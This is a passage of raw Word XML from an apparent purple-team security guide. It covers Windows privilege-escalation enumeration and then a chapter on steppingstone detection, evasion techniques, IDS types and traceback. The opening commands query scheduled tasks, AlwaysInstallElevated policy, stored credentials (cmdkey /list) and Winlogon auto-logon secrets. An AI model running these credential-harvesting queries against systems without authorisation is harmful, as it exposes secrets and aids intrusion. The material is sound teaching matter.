      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Scheduled tasks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">schtasks /query /fo LIST /v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># AlwaysInstallElevated (registry check)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Stored credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cmdkey /list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check for auto-logon credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">reg query 'HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F8A9A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">PART FIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">NETWORK SECURITY &amp; TRAFFIC ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 9: Network Traffic Analysis &amp; Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding how attacks look on the wire - and how defenders detect them - is essential for the purple team perspective. This chapter covers both the offensive and defensive sides of network security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1 Steppingstone Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers rarely attack directly from their own machine. They route attacks through compromised 'steppingstone' hosts to obscure their origin. Detecting this is a core skill for defenders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How a Steppingstone Chain Works:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  [Attacker] → [Steppingstone 1] → [Steppingstone 2] → [Target]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Remote hops make attribution difficult across jurisdictions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Methods:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Thumbprinting: Analyzing network traffic patterns (inter-packet timing, packet sizes) to link sessions through steppingstone chains. Even through encryption, timing patterns survive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Causality-based detection: Tracks causal relationships between network events. If traffic on one connection consistently causes traffic on another, they may be linked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Temporal thumbprints: The unique timing signature of a user's traffic that persists even through anonymizing proxies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Baselining: Establishing 'normal' traffic patterns. Anomalies from the baseline indicate potential attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evasion Techniques (Offensive Awareness):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Traffic obfuscation: Adding jitter (random delays) to disrupt timing analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol tunneling: Hiding attack traffic inside allowed protocols (DNS, HTTP, HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Traffic encryption: Prevents content inspection but not timing analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain length: More hops = harder attribution, but each hop adds latency</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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2E5F8A" w:sz="4"/>
              <w:left w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:right w:val="single" w:color="2E5F8A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="2E5F8A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PURPLE TEAM NOTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:left w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:right w:val="single" w:color="2E5F8A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D5E8F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">As both an offensive and defensive thinker, understand that every obfuscation technique has a detection counterpart. Study both sides - knowing how attackers evade detection helps you build better defenses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2 Intrusion Detection Systems (IDS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IDS systems monitor network traffic and system activity for signs of attack:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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230"/>
        <w:gridCol w:w="253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IDS Type</w:t>
            </w:r>
          </w:p>
        </w:tc>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How It Works</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="223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Strengths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Weaknesses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Signature-based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Matches traffic against known attack patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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 false positives, fast, easy to understand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Cannot detect zero-days or variants of known attacks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Anomaly-based</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Detects deviations from established baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Can detect novel attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Higher false positive rate; requires good baseline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Hybrid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Combines both approaches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Best of both worlds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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More complex to manage and tune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Stateful Protocol Analysis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Understands expected protocol behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Good for protocol abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Resource-intensive; requires protocol knowledge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3 Key Network Security Concepts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Demand Matrix: Mathematical representation of traffic flows between all source-destination pairs in a network. Used for capacity planning and anomaly detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Offered Load vs Carried Load: Offered load is traffic generated; carried load is traffic successfully transmitted. During attacks (like DDoS), offered load may far exceed carried load.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Path Flooding: Technique to trace attack traffic back toward its source using traceback methods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Probabilistic Packet Marking (PPM): Each router probabilistically marks packets with its IP. After collecting many packets, you can reconstruct the path back to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Data → Information → Knowledge Hierarchy: Raw packets are data. Analyzed patterns are information. Actionable understanding is knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
